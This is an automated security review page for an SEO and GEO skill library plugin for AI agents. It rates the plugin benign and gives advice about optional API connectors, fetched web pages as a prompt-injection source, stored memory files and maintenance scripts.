Pluginv9.9.5

ClawScan security

Aaron SEO GEO · ClawHub's context-aware review of the artifact, metadata, and declared behavior.

Scanner verdict

BenignApr 28, 2026, 4:06 AM

Verdict: benign
Confidence: high
Model: gpt-5-mini
Summary: This is a content-only SEO/GEO skill library whose declared files, instructions, and optional connectors are coherent with its stated purpose; it does not require secrets or perform installs by default, though optional integrations and memory features deserve user attention.
Guidance: Overall this repo appears to be what it claims — a large, content-only SEO/GEO skill library. Before installing or enabling integrations: - If you enable connectors (Ahrefs, Semrush, Notion, Slack, Cloudflare, etc.), only provide API keys/OAuth for services you trust and understand the data flow. These keys are optional and only needed for automated Tier-2/3 workflows. - Be mindful when using skills that fetch live URLs: the target site will see your request metadata (IP, UA) and fetched page content becomes part of the session context (possible prompt-injection source). Only fetch pages you control or trust. - Memory files (memory/) can contain prior audit data and may be loaded if you enable memory-management; avoid storing sensitive secrets or PII there and don't commit memory/ to public repos. - The repo includes maintenance shell scripts (validate-*.sh). If you plan to run them locally, inspect them first and run in an isolated environment if you have any doubt. - If you need higher assurance, ask the author for a short runbook: (1) exact triggers that auto-load memory, (2) whether any hooks (hooks/hooks.json) can trigger network calls without explicit user prompts, and (3) the contents of the validate scripts. These clarifications would increase confidence further.

Review Dimensions

Purpose & Capability: okThe name/description (SEO & GEO skills) match the repository contents: many SKILL.md files for keyword research, audits, content writing, monitoring, and related references. The listed MCP connectors (.mcp.json) and documentation explain optional integrations; no required env vars or unrelated binaries are declared. Nothing requested is disproportionate to an SEO/GEO skills library.
Instruction Scope: noteSKILL.md and CLAUDE.md instruct the agent to work with user-provided data, optionally fetch web pages (WebFetch), and use connector MCPs when configured. The repo documents memory tiers (HOT/WARM/COLD) and notes that prior audit results may be auto-loaded if memory-management is active. These behaviors are reasonable for the stated use case but mean: (1) fetching URLs will send your IP/User-Agent to target sites, (2) past session data in memory/ can be read or reused if you enable memory-management, and (3) web pages returned to the agent are treated as untrusted content (prompt-injection risk). All of these are documented in the privacy/security docs and align with the skill purpose.
Install Mechanism: okThere is no install spec; this is instruction/content-only. The only executable files are maintenance shell scripts (validate-*.sh) included for authoring/CI; they are not declared as required or automatically run by the platform. No downloads, packages, or unusual installers are present in the manifest.
Credentials: noteRegistry metadata lists no required env vars or primary credential. The documentation does reference optional API keys (e.g., AHREFS_API_KEY, AMPLITUDE_API_KEY) and many external MCP endpoints for optional integrations. Those optional credentials are proportionate to connecting third‑party SEO/analytics services; they are not required for Tier 1 (manual) operation.
Persistence & Privilege: okThe skill does not request always:true and makes no claims to modify other skills or system-wide settings. Memory-management is an explicit, opt-in cross-cutting skill; writes/reads to memory/ are documented as requiring user actions or explicit skill invocation. Autonomous invocation is allowed by default (normal platform behavior) but not elevated by this skill.